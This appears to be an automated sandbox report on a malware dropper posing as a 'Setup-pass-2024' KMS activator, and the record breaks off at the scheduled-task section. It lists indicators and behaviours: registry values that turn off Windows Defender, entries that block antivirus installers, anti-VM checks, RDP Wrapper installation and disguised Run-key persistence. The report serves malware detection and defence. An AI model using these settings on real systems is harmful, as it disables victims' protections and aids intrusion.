Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-06-2024 17:43
Behavioral task
behavioral1
Sample
Setup-pass-2024/Setup.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Setup-pass-2024/Setup.exe
Resource
win10v2004-20240508-en
General
-
Target
Setup-pass-2024/Setup.exe
-
Size
4.2MB
-
MD5
320e2e055e06df0aca09643116b3ef89
-
SHA1
cfc8e9f6140a9b04f8a3b240bbace0ec845a3196
-
SHA256
838f122a6e751fb3ffd45c48ea86374b0938ac70ffb6e05b1715f2de1f9bb04e
-
SHA512
5b40dcee0f08dd52cf9339197af1e19cbd99e576c8ece9eabefe4caf2fbfb11d95541035c1940c0017d1a020bfe9b14d5889d39610ee205809ab4b3982af34ae
-
SSDEEP
98304:t4mwM0MziYrBZUt8qxSiUIHrCPmYs3wP46U9Fu2DpECdko5M7gfYF:Wq0Wb0P6ILFW6uIEAE7g4
Malware Config
Signatures
-
Processes:
KMS.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" KMS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" KMS.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection KMS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" KMS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" KMS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" KMS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2" KMS.exe -
Processes:
KMS.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" KMS.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications KMS.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
Processes:
Setup.exeKMS.exeupdate.exesmss.exeIP.exeunsecapp.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ KMS.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ update.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ smss.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ IP.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ unsecapp.exe -
Blocks application from running via registry modification 28 IoCs
Adds application to list of disallowed applications.
Processes:
KMS.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" KMS.exe Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "cureit.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe" KMS.exe Set value (int) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\26 = "eset_smart_security_premium_live_installer.exe" KMS.exe -
Drops file in Drivers directory 1 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 2640 netsh.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
RDPWinst.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWinst.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
update.exesmss.exeIP.exeSetup.exeKMS.exeunsecapp.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion KMS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion KMS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IP.exe -
Executes dropped EXE 13 IoCs
Processes:
install.exeKMS.exeupdate.exewin.exesvchost.exeIP.exesmss.exewinserv.exewinserv.exewinserv.exewinserv.exeunsecapp.exeRDPWinst.exepid process 4504 install.exe 1272 KMS.exe 3708 update.exe 3328 win.exe 3912 svchost.exe 2304 IP.exe 2732 smss.exe 3812 winserv.exe 2860 winserv.exe 1636 winserv.exe 1320 winserv.exe 1944 unsecapp.exe 1372 RDPWinst.exe -
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid process 3932 svchost.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1616 icacls.exe 1548 icacls.exe 2212 icacls.exe 2724 icacls.exe 4060 icacls.exe 4416 icacls.exe 3332 icacls.exe 4080 icacls.exe 4492 icacls.exe 4752 icacls.exe 456 icacls.exe 3440 icacls.exe 1384 icacls.exe 5032 icacls.exe 2476 icacls.exe 4076 icacls.exe 788 icacls.exe 956 icacls.exe 1380 icacls.exe 5052 icacls.exe 5028 icacls.exe 1872 icacls.exe 1544 icacls.exe 3980 icacls.exe 4528 icacls.exe 1544 icacls.exe 4504 icacls.exe 3404 icacls.exe 1872 icacls.exe 4784 icacls.exe 4748 icacls.exe 3924 icacls.exe 2472 icacls.exe 3824 icacls.exe 864 icacls.exe 2580 icacls.exe 3604 icacls.exe 1472 icacls.exe 2492 icacls.exe 1960 icacls.exe 1800 icacls.exe 2724 icacls.exe 3928 icacls.exe 3364 icacls.exe 2252 icacls.exe 4412 icacls.exe 3328 icacls.exe 3604 icacls.exe 4512 icacls.exe 3784 icacls.exe 4800 icacls.exe 4648 icacls.exe 1492 icacls.exe 3116 icacls.exe 4768 icacls.exe 392 icacls.exe 4256 icacls.exe 2700 icacls.exe 1092 icacls.exe 1724 icacls.exe 864 icacls.exe 1072 icacls.exe 4000 icacls.exe 3024 icacls.exe -
Processes:
resource yara_rule behavioral3/memory/1804-0-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/1804-2-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/1804-3-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/1804-4-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/1804-5-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/1804-7-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/1804-8-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/1804-9-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/1804-6-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida C:\ProgramData\Setup\KMS.exe themida behavioral3/memory/1272-37-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp themida behavioral3/memory/1272-39-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp themida behavioral3/memory/1272-41-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp themida behavioral3/memory/1272-40-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp themida behavioral3/memory/1272-42-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp themida behavioral3/memory/1272-38-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp themida behavioral3/memory/1272-44-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp themida behavioral3/memory/1272-43-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp themida behavioral3/memory/1804-48-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/1272-49-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp themida behavioral3/memory/1804-50-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/3708-51-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/3708-54-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/3708-53-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/3708-52-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/3708-55-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/3708-56-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/3708-58-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/1804-59-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/3708-60-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/1804-61-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/3708-62-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/3708-86-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/1804-85-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/3708-87-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/1804-97-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida C:\ProgramData\Setup\IP.exe themida C:\ProgramData\Setup\smss.exe themida behavioral3/memory/2732-123-0x00007FF68A010000-0x00007FF68B043000-memory.dmp themida behavioral3/memory/2732-124-0x00007FF68A010000-0x00007FF68B043000-memory.dmp themida behavioral3/memory/2732-125-0x00007FF68A010000-0x00007FF68B043000-memory.dmp themida behavioral3/memory/2732-128-0x00007FF68A010000-0x00007FF68B043000-memory.dmp themida behavioral3/memory/2732-127-0x00007FF68A010000-0x00007FF68B043000-memory.dmp themida behavioral3/memory/2732-126-0x00007FF68A010000-0x00007FF68B043000-memory.dmp themida behavioral3/memory/2732-122-0x00007FF68A010000-0x00007FF68B043000-memory.dmp themida behavioral3/memory/2304-137-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp themida behavioral3/memory/2304-138-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp themida behavioral3/memory/2304-141-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp themida behavioral3/memory/2304-144-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp themida behavioral3/memory/2304-145-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp themida behavioral3/memory/2304-146-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp themida behavioral3/memory/2304-139-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp themida C:\Windows\SysWOW64\unsecapp.exe themida behavioral3/memory/1804-175-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp themida behavioral3/memory/3708-176-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp themida behavioral3/memory/2304-177-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp themida behavioral3/memory/2732-178-0x00007FF68A010000-0x00007FF68B043000-memory.dmp themida behavioral3/memory/2304-325-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp themida behavioral3/memory/1944-386-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp themida behavioral3/memory/1944-387-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp themida behavioral3/memory/1944-385-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp themida behavioral3/memory/1944-383-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp themida behavioral3/memory/1944-384-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp themida behavioral3/memory/1944-382-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
IP.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" IP.exe -
Processes:
Setup.exeKMS.exeupdate.exeIP.exesmss.exeunsecapp.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA KMS.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA update.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IP.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA smss.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA unsecapp.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Modifies WinLogon 2 TTPs 1 IoCs
Processes:
RDPWinst.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWinst.exe -
AutoIT Executable 52 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral3/memory/1804-3-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/1804-4-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/1804-5-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/1804-7-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/1804-8-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/1804-9-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/1804-6-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/1272-39-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp autoit_exe behavioral3/memory/1272-41-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp autoit_exe behavioral3/memory/1272-40-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp autoit_exe behavioral3/memory/1272-42-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp autoit_exe behavioral3/memory/1272-44-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp autoit_exe behavioral3/memory/1272-43-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp autoit_exe behavioral3/memory/1804-48-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/1272-49-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp autoit_exe behavioral3/memory/1804-50-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/3708-54-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp autoit_exe behavioral3/memory/3708-53-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp autoit_exe behavioral3/memory/3708-55-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp autoit_exe behavioral3/memory/3708-56-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp autoit_exe behavioral3/memory/3708-58-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp autoit_exe behavioral3/memory/1804-59-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/3708-60-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp autoit_exe behavioral3/memory/1804-61-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/3708-62-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp autoit_exe behavioral3/memory/3708-86-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp autoit_exe behavioral3/memory/1804-85-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/3708-87-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp autoit_exe behavioral3/memory/1804-97-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/2732-123-0x00007FF68A010000-0x00007FF68B043000-memory.dmp autoit_exe behavioral3/memory/2732-124-0x00007FF68A010000-0x00007FF68B043000-memory.dmp autoit_exe behavioral3/memory/2732-125-0x00007FF68A010000-0x00007FF68B043000-memory.dmp autoit_exe behavioral3/memory/2732-128-0x00007FF68A010000-0x00007FF68B043000-memory.dmp autoit_exe behavioral3/memory/2732-127-0x00007FF68A010000-0x00007FF68B043000-memory.dmp autoit_exe behavioral3/memory/2732-126-0x00007FF68A010000-0x00007FF68B043000-memory.dmp autoit_exe behavioral3/memory/2304-138-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp autoit_exe behavioral3/memory/2304-141-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp autoit_exe behavioral3/memory/2304-144-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp autoit_exe behavioral3/memory/2304-145-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp autoit_exe behavioral3/memory/2304-146-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp autoit_exe behavioral3/memory/2304-139-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp autoit_exe behavioral3/memory/1804-175-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp autoit_exe behavioral3/memory/3708-176-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp autoit_exe behavioral3/memory/2304-177-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp autoit_exe behavioral3/memory/2732-178-0x00007FF68A010000-0x00007FF68B043000-memory.dmp autoit_exe behavioral3/memory/2304-325-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp autoit_exe behavioral3/memory/1944-386-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp autoit_exe behavioral3/memory/1944-387-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp autoit_exe behavioral3/memory/1944-385-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp autoit_exe behavioral3/memory/1944-383-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp autoit_exe behavioral3/memory/1944-384-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp autoit_exe behavioral3/memory/1944-382-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp autoit_exe -
Drops file in System32 directory 3 IoCs
Processes:
IP.exeRDPWinst.exedescription ioc process File created C:\Windows\SysWOW64\unsecapp.exe IP.exe File opened for modification C:\Windows\SysWOW64\unsecapp.exe IP.exe File created C:\Windows\System32\rfxvmt.dll RDPWinst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
Setup.exeKMS.exeupdate.exeIP.exesmss.exeunsecapp.exepid process 1804 Setup.exe 1272 KMS.exe 3708 update.exe 2304 IP.exe 2732 smss.exe 1944 unsecapp.exe -
Drops file in Program Files directory 46 IoCs
Processes:
update.exesmss.exeRDPWinst.exedescription ioc process File opened for modification C:\Program Files\AVG update.exe File opened for modification C:\Program Files\Kaspersky Lab update.exe File opened for modification C:\Program Files (x86)\IObit\IObit Malware Fighter update.exe File opened for modification C:\Program Files (x86)\SpeedFan update.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini smss.exe File opened for modification C:\Program Files\Enigma Software Group update.exe File opened for modification C:\Program Files\AVAST Software update.exe File opened for modification C:\Program Files (x86)\Cezurity update.exe File opened for modification C:\Program Files (x86)\IObit\Advanced SystemCare update.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWinst.exe File opened for modification C:\Program Files\ByteFence update.exe File opened for modification C:\Program Files\Bitdefender Agent update.exe File opened for modification C:\Program Files\RogueKiller update.exe File opened for modification C:\Program Files (x86)\360 update.exe File opened for modification C:\Program Files\Malwarebytes update.exe File opened for modification C:\Program Files\DrWeb update.exe File opened for modification C:\Program Files\COMODO update.exe File opened for modification C:\Program Files (x86)\AVG update.exe File opened for modification C:\Program Files\Common Files\Doctor Web update.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab update.exe File opened for modification C:\Program Files\Common Files\McAfee update.exe File opened for modification C:\Program Files\ESET update.exe File opened for modification C:\Program Files\EnigmaSoft update.exe File opened for modification C:\Program Files (x86)\GPU Temp update.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWinst.exe File opened for modification C:\Program Files (x86)\SpyHunter update.exe File opened for modification C:\Program Files (x86)\AVAST Software update.exe File opened for modification C:\Program Files\Loaris Trojan Remover update.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus update.exe File opened for modification C:\Program Files\Ravantivirus update.exe File opened for modification C:\Program Files (x86)\IObit update.exe File opened for modification C:\Program Files (x86)\Transmission update.exe File opened for modification C:\Program Files (x86)\Microsoft JDX update.exe File opened for modification C:\Program Files\Common Files\AV update.exe File opened for modification C:\Program Files\Rainmeter update.exe File opened for modification C:\Program Files\Process Hacker 2 update.exe File opened for modification C:\Program Files (x86)\Moo0 update.exe File opened for modification C:\Program Files (x86)\Panda Security update.exe File opened for modification C:\Program Files\SUPERAntiSpyware update.exe File created C:\Program Files\Common Files\System\iediagcmd.exe update.exe File opened for modification C:\Program Files\SpyHunter update.exe File opened for modification C:\Program Files\Process Lasso update.exe File opened for modification C:\Program Files\Transmission update.exe File opened for modification C:\Program Files\RDP Wrapper smss.exe File opened for modification C:\Program Files\HitmanPro update.exe File opened for modification C:\Program Files\Cezurity update.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
smss.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString smss.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
